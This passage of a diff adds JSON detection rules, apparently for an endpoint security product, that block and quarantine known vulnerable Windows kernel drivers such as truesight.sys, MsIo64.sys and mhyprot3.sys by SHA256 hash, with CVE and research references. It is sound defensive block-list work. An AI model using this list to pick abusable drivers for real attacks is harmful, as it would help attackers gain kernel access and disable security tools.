+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619629Z",
+ "creation_date": "2026-03-23T11:45:29.619631Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ca213b79336c69128620bc39e6d987c1e605299fb6525344ba1b08b7829197c7",
+ "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4bf71f1-1a99-52d4-a6bc-a9b6fddc6fbd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491394Z",
+ "creation_date": "2026-03-23T11:45:31.491397Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491404Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cecaab47700515a475fc4a3385b4463a743db9a9612aebbd68f9aa065c7bcd6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4c41d35-4002-592c-9d97-03390ad0dec0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614885Z",
+ "creation_date": "2026-03-23T11:45:29.614886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4d35d1e-2b94-55aa-88b6-b5f018cc7526",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817540Z",
+ "creation_date": "2026-03-23T11:45:30.817542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817547Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "700b9839fde53e91f0847053b4d2eb8d9bd3aca098844510f1fa3bab6a37eb24",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4e23811-0d49-56b9-a017-bd44ce8c0c4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474530Z",
+ "creation_date": "2026-03-23T11:45:30.474533Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474542Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2274f63f88ec9b2d2ecfca3068026d62cf3085f76329b11b37498ce2b2b644a8",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4e3b56a-2585-5339-bd66-3c8b888f6fac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144236Z",
+ "creation_date": "2026-03-23T11:45:31.144238Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144243Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18783da092f16c67f269ab2dd4f62600efc3d4eb5a93b279ecfc5be4584b6628",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4f85165-01a2-5363-9715-55fd1a294dbb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149963Z",
+ "creation_date": "2026-03-23T11:45:31.149965Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149971Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bc651859a42e13f267b48a759098915bfac28372fd9c18c64ccbac1922adcc8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5052ef3-4151-5de4-9828-9c1dc06777f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479047Z",
+ "creation_date": "2026-03-23T11:45:31.479051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0c3dacb935b9f70192e0cade7d8a5cf3003d0a6fd22170198d9be422437e8d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5162dd4-961a-5996-95d3-8e6c8c5fca6a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156535Z",
+ "creation_date": "2026-03-23T11:45:31.156537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156542Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a642fd26c18c5806aa5c5f9208118ff73d4fa6c5a78a29b552552a2160b355ad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e52455e3-40d0-57fc-882d-79b78cbaf6ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814389Z",
+ "creation_date": "2026-03-23T11:45:31.814392Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814400Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e98e71356773016fa51de8a675e58ccc506426d203c13f7ddf3642304ae9db5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e52654c5-b3cb-59b1-b17f-8456e7e35f89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614249Z",
+ "creation_date": "2026-03-23T11:45:29.614251Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d55dd56e24df201d1ad2204d565da5e8e6080d895c1ac2873a6afdcbb4c8b8c7",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e532d449-3187-55e2-b64d-6752d5d8fc61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604950Z",
+ "creation_date": "2026-03-23T11:45:29.604952Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604958Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93969f4b5e79795322d88bd491cef1092f93f84c5f4e264e89f31dc9521995e0",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5489231-42ac-5239-a4cd-ab3f16369f73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825646Z",
+ "creation_date": "2026-03-23T11:45:31.825648Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825653Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bee9495bd010444b16de63df1273db3b2b0d4913951bc03da73a39274e1255e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e55b5bea-ace3-5f55-878f-a41272afbb8f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452247Z",
+ "creation_date": "2026-03-23T11:45:30.452251Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452260Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb29eb4651e3276b14217628e96a1e5d83c4e883cd29ebd75aa704dda462e82d",
+ "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e55d2545-f0b2-54f8-a9df-828cdf1ddcce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456190Z",
+ "creation_date": "2026-03-23T11:45:30.456194Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456203Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "603ccc97a198b004f9fa56deed2295d1b2d42ef01f22d80a00cb28bcf1b85646",
+ "comment": "Vulnerable Kernel Driver (aka kdriver.sys) [https://www.loldrivers.io/drivers/51808fa6-89a4-4f4d-aabc-0a7b0e99e34d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5709818-95ab-5630-9444-79cc62fae133",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142718Z",
+ "creation_date": "2026-03-23T11:45:31.142720Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142725Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b831a6ff8e42f6cce281f70dcf2c8a8787f46316804a03d7a55559e6b9819fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e572d5c6-e785-55f8-8369-8640663b381d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478288Z",
+ "creation_date": "2026-03-23T11:45:30.478291Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478300Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b50b11e2203942695380869c6072e15479290bc57da2ec5df3481a36b8a8561e",
+ "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e576b0cf-5f2d-5bf9-ab56-af1e9ee29c46",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984601Z",
+ "creation_date": "2026-03-23T11:45:29.984603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984609Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad23d77a38655acb71216824e363df8ac41a48a1a0080f35a0d23aa14b54460b",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/2ada18ae-2c52-49b6-b1a0-cf3b267f6dc7/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e581d178-dfb6-5666-afd5-3927e99524cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972970Z",
+ "creation_date": "2026-03-23T11:45:29.972973Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972978Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8137ce22d0d0fc5ea5b174d6ad3506a4949506477b1325da2ccb76511f4c4f60",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5822ea3-f133-5f6f-b6a4-366101b00e48",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983031Z",
+ "creation_date": "2026-03-23T11:45:29.983033Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983039Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a844a8d993db0ee1159b096aee959e32bb9155edd9167b1e6aad2e4019202dd",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5836158-e976-5d90-8850-15f829447f5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619894Z",
+ "creation_date": "2026-03-23T11:45:29.619897Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619902Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2645298d84585fa987450aa11687b73739cbbc26abaa8125099cae5889beb211",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e58d1935-7b5f-5922-a990-9f48583b42ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829977Z",
+ "creation_date": "2026-03-23T11:45:31.829979Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829984Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb087998562cc6ac2fa31eb975d6d5cb112f05590a4c0026d7261b351ee66994",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5969a35-df2f-5d38-915a-25ea2f673383",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460322Z",
